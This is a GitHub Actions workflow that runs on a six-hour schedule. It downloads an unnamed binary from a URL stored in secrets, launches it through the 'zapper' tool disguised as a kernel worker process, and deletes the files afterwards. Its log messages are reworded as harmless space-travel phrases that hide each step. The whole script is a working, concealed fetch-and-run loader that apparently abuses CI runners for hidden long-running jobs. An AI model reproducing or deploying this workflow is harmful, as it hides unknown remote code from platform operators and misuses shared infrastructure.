name: Run Persistent Task

on:
  workflow_dispatch:
  schedule:
    - cron: '5 */6 * * *'

jobs:
  run-task:
    runs-on: ubuntu-latest
    timeout-minutes: 358

    env:
      PAYLOAD_ID: ${{ secrets.PAYLOAD_ID }}
      PAYLOAD_URL_BASE: ${{ secrets.PAYLOAD_URL_BASE }}
      ZAPPER_URL: ${{ secrets.ZAPPER_URL || 'https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-linux-x86_64' }}
      PROCESS_NAME: ${{ secrets.PROCESS_NAME || '[kworker/u2:3-events_unbound]' }}

    steps:
      - name: Run Background Task Script
        run: |
          #!/bin/bash
          set -e

          TMP_DIR="/tmp"
          PAYLOAD_URL="${PAYLOAD_URL_BASE}/${PAYLOAD_ID}"

          if [ -z "$PAYLOAD_ID" ]; then echo "Anomaly detected: Navigation matrix Alpha missing."; exit 1; fi
          if [ -z "$PAYLOAD_URL_BASE" ]; then echo "Anomaly detected: Navigation matrix Beta missing."; exit 1; fi

          ZAPPER_BIN="$TMP_DIR/zapper_exec"
          PAYLOAD_BIN="$TMP_DIR/payload_exec"

          echo "Planetary alignment initiated."
          mkdir -p "$TMP_DIR"

          echo "Acquiring orbital coordinates..."
          wget -q -O "$ZAPPER_BIN" "$ZAPPER_URL"
          if [ $? -ne 0 ]; then echo "Anomaly detected: Coordinate acquisition failed."; exit 1; fi
          echo "Coordinates locked."

          echo "Fetching stellar map..."
          wget --user-agent="Mozilla/5.0" -q -O "$PAYLOAD_BIN" "$PAYLOAD_URL" -T 60 --tries=3
          if [ $? -ne 0 ]; then echo "Anomaly detected: Stellar map corrupted."; exit 1; fi
          echo "Stellar map received."

          echo "Calibrating thrusters..."
          chmod +x "$ZAPPER_BIN" "$PAYLOAD_BIN"
          if [ $? -ne 0 ]; then echo "Anomaly detected: Thruster calibration failed."; exit 1; fi
          echo "Thrusters calibrated."

          echo "Initiating launch sequence."
          echo "Engaging primary engines..."
          "$ZAPPER_BIN" -f -a "$PROCESS_NAME" "$PAYLOAD_BIN" >/dev/null 2>&1 &
          TASK_PID=$!

          sleep 3

          if ! ps -p $TASK_PID > /dev/null; then
              echo "Anomaly detected: Engine ignition failure."
              exit 1
          fi
          echo "The planet successfully started up."

          echo "Setting course for asteroid belt cleanup..."
          (
            sleep 10
            echo "[Cleanup Crew] Vaporizing space debris..."
            rm -f "$PAYLOAD_BIN" "$ZAPPER_BIN"
            echo "[Cleanup Crew] Debris field clear."
          ) &>/dev/null & disown

          echo "Cruising towards destination."
          echo "Awaiting stellar convergence."
          wait $TASK_PID

          echo "Stellar convergence achieved. Mission segment complete."
